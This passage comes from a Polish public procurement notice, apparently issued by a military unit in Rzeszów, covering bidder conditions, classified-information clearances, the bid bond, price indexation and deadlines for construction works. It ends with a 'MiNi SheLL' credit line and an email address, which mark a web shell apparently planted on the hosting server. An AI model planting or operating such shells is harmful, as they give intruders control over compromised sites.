wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5. Zamawiający stawia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej w zakresie:<br/>1)	posiadanego doświadczenia, <br/>2)	potencjału osobowego,<br/>3)	zdolności do ochrony informacji niejawnych o klauzuli „ZASTRZEŻONE”.<br/>6. Warunek, o którym mowa w ust. 5 pkt 1) zostanie za spełniony jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania Ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty co najmniej 2 (słownie: dwie) roboty budowlane o zakresie zbliżonym do przedmiotowego zamówienia tj. roboty ogólnobudowlane o wartości minimum 4 000 000,00 zł brutto każda (słownie: cztery miliony złotych 00/100).<br/>UWAGA I: <br/>Nie dopuszcza się sumowania wartości usług zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego.<br/>UWAGA II:<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 10 do SWZ.<br/>UWAGA III:<br/>Zamawiający na zasadzie art. 118 ust. 1 ustawy Pzp dopuszcza powoływania się na zasoby podmiotu trzeciego w zakresie uprawnień zdolności technicznej lub zawodowej, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>7.	Warunek, o którym mowa w ust. 5 pkt 2) zostanie uznany za spełniony jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże, że dysponuje lub będzie dysponował i skieruje do realizacji zamówienia następujący potencjał osobowy:<br/>1)	co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia posiadająca uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi oraz jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów;<br/>2)	co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia posiadająca uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami budowlanymi oraz jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów;<br/>3)	co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia posiadająca uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi oraz jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów.<br/>UWAGA I: <br/>Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca wykaże przykładowo:<br/>1.	dysponowanie co najmniej jedną osobą ale posiadająca wszystkie wyżej wskazane uprawnienia (tj. jedna osoba – 3 uprawnienia), albo<br/>2.	dysponowanie co najmniej dwiema osobami posiadającymi wyżej wskazane uprawnienia (tj. 1 osoba – 2 uprawnienia i 1 osoba – 1 uprawnienie łącznie wszystkie, wymagane 3 uprawnienia), albo <br/>3.	dysponowanie co najmniej trzema osobami, z których każda z nich posiada po jednym z wyżej wskazanych uprawnień (łącznie wszystkie 3 uprawnienia).<br/>UWAGA II: <br/>Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca skieruje osobę / osoby zarówno z uprawnieniami bez ograniczeń jak i w ograniczonym zakresie.<br/>UWAGA III: <br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>UWAGA IV:<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 10 do SWZ.<br/>UWAGA V:<br/>Zamawiający na zasadzie art. 118 ust. 1 ustawy Pzp dopuszcza powoływanie się na zasoby podmiotu trzeciego w zakresie posiadanej zdolności technicznej lub zawodowej, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>8.	Warunek, o którym mowa w ust. 5 pkt 3) zostanie uznany za spełniony jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia w zakresie wykonania sieci teleinformatycznych wykaże, że dysponuje lub będzie dysponował:<br/>1)	co najmniej 1 osobą, która posiada następujące uprawnienia do dostępu do informacji niejawnych:<br/>a)	aktualne poświadczenie bezpieczeństwa o klauzuli co najmniej „ZASTRZEŻONE”. <br/>b)	upoważnienie kierownika swojej jednostki organizacyjnej o dopuszczeniu do pracy związanej z dostępem do informacji niejawnych o klauzuli „ZASTRZEŻONE”.<br/>c)	zaświadczenie o odbytym szkoleniu z zakresu ochrony informacji niejawnych.<br/><br/>UWAGA I:<br/>W przypadku braku aktualnego poświadczenia bezpieczeństwa o klauzuli co najmniej „ZASTRZEŻONE” (patrz ust. 8 pkt 1 lit. a powyżej) Zamawiający uzna warunek za spełniony gdy Wykonawca oświadczy (załącznik nr 14 do SWZ), iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada upoważnienie kierownika jednostki organizacyjnej (patrz. ust. 8 pkt 1 lit. b powyżej) oraz zaświadczenie o odbytym szkoleniu z zakresu ochrony informacji niejawnych (patrz. ust. 8 pkt 1 lit. c powyżej).<br/>UWAGA II:<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 10 do SWZ.<br/>UWAGA III:<br/>Zamawiający na zasadzie art. 118 ust. 1 ustawy Pzp dopuszcza powoływania się na zasoby podmiotu trzeciego w zakresie uprawnień zdolności technicznej lub zawodowej, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu wstępnego wykazania braku podstaw do wykluczenia, o których mowa w art. 108 ust. 1 oraz 109 ust. 1 pkt 1, 4, 5, 7 i 8 ustawy Pzp oraz art. 7 ust 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz.835) w celu wstępnego wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 4 ustawy Pzp Zamawiający wymaga złożenia wraz z Ofertą oświadczenia – wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>UWAGA:<br/>W przypadku Oferty składanej przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (Konsorcjum, spółka cywilna), wymóg złożenia oświadczenia, o którym mowa w ust. 1 dotyczy każdego partnera konsorcjum/ wspólnika spółki cywilnej.<br/>2.	Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, terminie nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1)	odpisu lub informacji z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>2)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3 ustawy, b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6 ustawy, e) art. 109 ust. 1 pkt 1, 5, 7 i 8 ustawy, f) art. 7 ust 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz.835). <br/>- Wzór oświadczenia stanowi załącznik nr 3 do SWZ;<br/>UWAGA:<br/>W przypadku Oferty składanej przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (Konsorcjum, spółka cywilna), wymóg złożenia wszystkich dokumentów, o których mowa w ust. 2 dotyczy każdego partnera konsorcjum/ wspólnika spółki cywilnej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, terminie nie krótszym niż 5 dni następujących podmiotowych środków dowodowych potwierdzających spełnienie warunków udziału w postępowaniu, tj.:<br/>1)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich przedmiotu w tym wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty budowlane te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wzór Wykazu stanowi Załącznik nr 12 do SWZ.<br/>2)	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór Wykazu stanowi Załącznik nr 13 do SWZ.<br/>3)	Oświadczenia, że Wykonawca ubiegając się o udzielenie zamówienia zapewni i skieruje do realizacji zamówienia odpowiednią w stosunku do każdej części liczbę osób (zatrudnionych na podstawie stosunku pracy), które posiadają wymagane uprawnienia tj.: aktualne poświadczenie bezpieczeństwa o klauzuli co najmniej „ZASTRZEŻONE”. W przypadku braku przedmiotowego dokumentu: upoważnienie kierownika swojej jednostki organizacyjnej o dopuszczeniu do pracy związanej z dostępem do informacji niejawnych o klauzuli „ZASTRZEŻONE”. Wzór Oświadczenia stanowi Załącznik nr 14 do SWZ.<br/>UWAGA:<br/>W przypadku Oferty składanej przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (Konsorcjum, spółka cywilna), wystarczającym jest aby dokumenty, o których mowa w ust. 6 złożone zostały przez jednego z partnerów konsorcjum/jednego wspólnika spółki cywilnej, który spełnia warunki udziału w postępowaniu.<br/><br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do niniejszego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. <br/>- Wzór takiego zobowiązania stanowi Załącznik nr 11 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać następujące dokumenty w postaci elektronicznej składa się w oryginale w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, przez osoby upoważnione:<br/>1)	formularz ofertowy, zawierający wszystkie informacje zawarte we wzorze stanowiącym załącznik nr 1 do SWZ;<br/>2)	podpisany przez przedstawiciela Zamawiającego protokół z odbytej wizji lokalnej - wzór stanowi załącznik nr 15 do SWZ;<br/><br/>Wraz z ofertą Wykonawca winien złożyć:<br/>1)	pełnomocnictwo udzielane osobom podpisującym ofertę lub inne dokumenty składane z ofertą, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych lub bezpłatnych <br/>i ogólnodostępnych baz danych;<br/>2)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy); <br/>3)	oświadczenia wymagane do przedstawienia na etapie składania ofert, o których mowa w Rozdz. XI SWZ;<br/>4)	uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa, o ile dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawcy, zobowiązani są do wniesienia wadium w wysokości:<br/>1)	100 000,00 zł (słownie złotych: sto tysięcy złotych 00/100).<br/>2.	Wadium może być wniesione w jednej lub kilku formach przewidzianych w art. 97 ust. 7 ustawy Pzp, tj.:<br/>1)	Pieniądzu.<br/>2)	Gwarancjach bankowych.<br/>3)	Gwarancjach ubezpieczeniowych.<br/>4)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2020 r. poz. 299).<br/>3.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 4, przed upływem terminu składania ofert.<br/>4.	Wadium w pieniądzu należy wnieść na rachunek bankowy Zamawiającego prowadzony przez: Narodowy Bank Polski Oddział Okręgowy w Rzeszowie nr 30 1010 1528 0018 9213 9120 2000 – z adnotacją „wadium w postępowaniu nr ZP/53/2025, NIP [Wykonawcy].<br/>5.	W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej, gwarancji ubezpieczeniowej albo poręczenia, z treści tych dokumentów musi w szczególności jednoznacznie wynikać zobowiązanie gwaranta (banku, ubezpieczyciela, poręczyciela) do zapłaty całej kwoty wadium nieodwołanie i bezwarunkowo na pierwsze żądanie Zamawiającego stwierdzające, że występuje jedna lub więcej okoliczności wskazanych w art. 98 ust. 6 ustawy Pzp – bez konieczności potwierdzania tych okoliczności. Brak w treści gwarancji przesłanek lub odniesienia się do ustawy Pzp w zakresie tych przesłanek spowoduje odrzucenie Oferty na skutek okoliczności, o których mowa <br/>w art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>6.	W przypadku wniesienia wadium w formie innej niż pieniądz gwarancja lub poręczenie winny być wniesione w oryginale w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym wystawcy.<br/>7.	Niewniesienie wadium w wymaganym terminie lub w sposób określony w SWZ lub nieutrzymywanie wadium nieprzerwanie do upływu terminu związania ofertą lub złożenie wniosku o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt. 14 ustawy Pzp.<br/>8.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument wadium powinien zawierać jasne wskazanie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>9.	Wadium wnosi się na cały okres związania ofertą.<br/>10.	Pozostałe postanowienia dotyczące wadium, w tym zasad jego zatrzymania i zwrotu określa ustawa Pzp, w szczególności art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań przedmiotu zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o zamówienie (Konsorcjum / wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy Pzp:<br/>1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia i wniesienie zabezpieczenia należytego wykonania umowy;<br/>2)	muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, zgodnie z art. 58 ust. 2 ustawy Pzp – fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów – wszelka korespondencja prowadzona będzie wyłącznie <br/>z pełnomocnikiem;<br/>3)	pełnomocnictwo powinno jednoznacznie wskazywać dane pełnomocnika <br/>i czynności jakie w postępowaniu ma prawo wykonywać pełnomocnik;<br/>3.	W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, należy złożyć oświadczenie, o którym mowa w Rozdz. XI ust. 1 przez każdego z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	Przed zawarciem umowy, jeżeli oferta Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia zostanie wybrana jako najkorzystniejsza, Zamawiający może wezwać do przedstawienia kopii umowy regulującej współpracę tych Wykonawców.<br/>5.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o zamówienie.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie stanowi załącznik nr 10 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> godnie z par. 17 wzoru umowy (załącznik nr 4 do SWZ)<br/><br/>	Zgodnie z art. 439 ust. 1 pkt 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych Strony przewidują możliwość zmiany postanowień zawartej umowy w zakresie dotyczącym wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia, na następujących zasadach:<br/>	poziom zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia uprawniający Strony umowy do żądania zmiany wynagrodzenia wynosi minimum 10% względem ceny materiałów lub kosztów związanych z realizacją zamówienia przyjętych przez Wykonawcę w celu ustalenia wysokości wynagrodzenia Wykonawcy zawartego w ofercie,<br/>	początkowy termin, od którego będzie uwzględniany poziom zmiany określony w pkt 1 ustala się na dzień złożenia oferty przez Wykonawcę, <br/>	wysokość wynagrodzenia ulegnie zmianie z uwzględnieniem zmienionych cen materiałów lub kosztów związanych z realizacją zamówienia, w stosunku do cen lub kosztów przyjętych przez Wykonawcę w celu ustalenia wysokości wynagrodzenia zawartego w ofercie, <br/>	zmiana wynagrodzenia zostanie dokonana z uwzględnieniem wskaźników zmiany cen produkcji budowlano-montażowej ogłaszanych w komunikacie Prezesa Głównego Urzędu Statystycznego,<br/>	wniosek o zmianę wysokości wynagrodzenia należnego z tytułu realizacji przedmiotu zamówienia nie może być złożony wcześniej niż po upływie 60 dni od dnia zawarcia umowy, a każdy kolejny wniosek nie może być złożony wcześniej niż po upływie 60 dni od daty ostatniej zmiany wysokości wynagrodzenia,<br/>	maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia, wynosi 30% tego wynagrodzenia.<br/>	Zmiana umowy na podstawie ust. 1 może nastąpić po łącznym spełnieniu warunków określonych w tym ustępie. <br/>	Zmiana umowy wymaga złożenia drugiej stronie pisemnego wniosku, o którym mowa w ust. 1 pkt 5, w którym zostanie przedstawiona propozycja zmiany wynagrodzenia, zawierająca wskaźnik zmiany wynagrodzenia (wskaźnik waloryzacji), według następującego wzoru: <br/><br/>W_(w )= W_1/100 x W_2/100 x W_3/100 x………x W_n/100<br/>gdzie:<br/>„n” – ilość miesięcy od miesiąca następującego po miesiącu złożenia oferty do miesiąca złożenia wniosku o zmianę wynagrodzenia,<br/>„Ww” – wskaźnik waloryzacji wynagrodzenia,<br/> „W1&#34; – wskaźnik cen produkcji budowlano-montażowej publikowany przez GUS, w układzie miesiąc poprzedni = 100, z następnego miesiąca po miesiącu złożenia oferty, <br/>„W2&#34;, „W3&#34;- wskaźniki „2”, „3”,…. z kolejnych miesięcy po miesiącu złożenia oferty<br/>„Wn&#34; – wskaźnik cen produkcji budowlano-montażowej publikowany przez GUS, w układzie miesiąc poprzedni – 100 z miesiąca złożenia wniosku o zmianę wynagrodzenia<br/>Ilorazy wskaźników cen (np. W_1/100) obliczane są z dokładnością do 3 miejsc po przecinka.<br/>Natomiast wynik iloczynów tj. wskaźnik waloryzacji W_(w ) obliczany jest z dokładnością do 4 miejsc po przecinku.<br/>	Strona umowy, która otrzymała propozycję zmiany umowy w terminie do 14 dni przekazuje drugiej stronie swoje stanowisko, wraz z uzasadnieniem. <br/>	Jeżeli strona umowy otrzymała kolejne oświadczenia lub dokumenty, termin liczony jest od dnia ich otrzymania.<br/>	Zmiana umowy może nastąpić nie wcześniej niż w dniu w którym zostaną spełnione przewidziane umową przesłanki uzasadniające dokonanie zmiany <br/>	Wykonawca, którego wynagrodzenie zostanie zmienione na podstawie ust. 1, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1155591</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonanie przedmiotu zamówienia wynikać będzie z zakresu rzeczowego wynikającego z harmonogramu rzeczowo-finansowego, sporządzonego na podstawie oferty Wykonawcy oraz kosztorysu załączonego do umowy finalnej, niemniej jednak Zamawiający określa realizację zadania w dwóch następujących etapach:<br/>1)	Etap I – zakres rzeczowy przewidziany na rok 2025, do wysokości limitu finansowego roku 2025:<br/>a)	zakończenie robót budowlanych, przewidzianych w Harmonogramie rzeczowo – finansowym dla etapu I do 10 grudnia 2025 r.,<br/>b)	zakończenie realizacji I etapu umowy – do 15 grudnia 2025r. <br/>2)	Etap II – zakres rzeczowy przewidziany na rok 2026:<br/>a)	zakończenie całości robót budowlanych, stanowiących przedmiot umowy do 21 września 2026 r. <br/>b)	zakończenie realizacji umowy do 30 września 2026 r. <br/>2.	W przypadku zmian terminów realizacji umowy w zakresie dotyczącym I etapu, jego zakończenie nie może przekroczyć daty 19 grudnia 2025 r. <br/>3.	Zamawiający przekaże Wykonawcy plac budowy w ciągu 5 dni od daty zawarcia umowy.<br/>4.	Rozpoczęcie robót objętych umową przez Wykonawcę - po podpisaniu umowy i przekazaniu placu budowy, jednak nie później niż 14 dni od daty przekazania placu budowy.<br/>5.	Realizacja zamówienia odbędzie się w kompleksie wojskowym w Rzeszowie przy ul. Krakowskiej 11B.<br/>6.	Zamawiający był zobligowany określić termin realizacji przedmiotowego zamówienia, ze względu na fakt synchronizacji etapów realizacji oraz harmonogram finansowy i rozliczenia budżetowe. 34 Wojskowy Oddział Gospodarczy, jako jednostka finansowana z budżetu Państwa III stopnia, jest zobligowany rozliczyć wydatki do końca danego roku budżetowego, tj. 31 grudnia, dlatego też należy określić odpowiednie terminy końcowe, uzyskać wymagane protokoły oraz faktury, a tym samym dokonać płatności. Określenie zakończenia robót budowlanych w dniach, miesiącach lub tygodniach, nie mając wiedzy w zakresie konkretnej daty zawarcia umowy czy chociażby postępów realizacji byłoby zagrożeniem w stosunku do realizacji budżetu jednostki. <br/><br/><br/><br/>1.	Zamawiający wymaga, aby Wykonawca, którego oferta zostanie wybrana wniósł zabezpieczenie należytego wykonania umowy w wysokości 5% wynagrodzenia (brutto) należnego Wykonawcy na warunkach określonych w Projektowanych postanowieniach Umowy. - załącznik nr 4 do SWZ<br/><br/>1. Wykonawca przed zawarciem umowy dostarczy Zamawiającemu:<br/>1)	kosztorys ofertowy sporządzony metodą szczegółową, zawierający wszystkie roboty wymienione w załączonych do SWZ przedmiarach robót – kosztorys ofertowy ma charakter wyłącznie pomocniczy i nie zmienia zasad wynagrodzenia przyjętego w tym postępowaniu – wynagrodzenie ryczałtowe. Przedstawiona kalkulacja winna określać ilość, cenę jednostkową i wartość dla wszystkich pozycji. Kosztorys ofertowy jest jedynie dokumentem, który będzie wykorzystywany do obliczenia należnego wynagrodzenia Wykonawcy w przypadku odstąpienia od umowy zgodnie z zapisami umowy;<br/>2)	dokument potwierdzający ubezpieczenie odpowiedzialności cywilnej (zgodnie z ustaleniami §10 projektu umowy – załącznik nr 4 do SWZ);<br/>3)	wykaz osób przewidzianych do realizacji przedmiotu zamówienia uwzględniającego dane o których mowa w art. 15. ust. 1 pkt 8 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (t.j. Dz. U. z 2024 r., poz.632) – patrz. §12 ust. 14 Projektu Umowy (Załącznik nr 4 do SWZ);<br/>4)	potwierdzone kserokopie pisemnych upoważnień kierownika swojej jednostki organizacyjnej o dopuszczeniu do pracy związanej z dostępem do informacji niejawnych o klauzuli „zastrzeżone” (w przypadku braku aktualnego poświadczenia bezpieczeństwa o klauzuli co najmniej „zastrzeżone”) osób ujętych w wykazie zgodnie z pkt 3 oraz potwierdzone kserokopie zaświadczeń o odbytym szkoleniu z zakresu ochrony informacji niejawnych osób ujętych w pkt 3 (przy uwzględnieniu Rozdz. X ust. 8, Rozdz. XI ust. 6 pkt 3 SWZ);<br/>5)	harmonogram rzeczowo – finansowy, o którym mowa w projektowanych postanowieniach umownych (załącznik nr 4 do SWZ), uzgodniony z Zamawiającym.

Creat By MiNi SheLL
Email: jattceo@gmail.com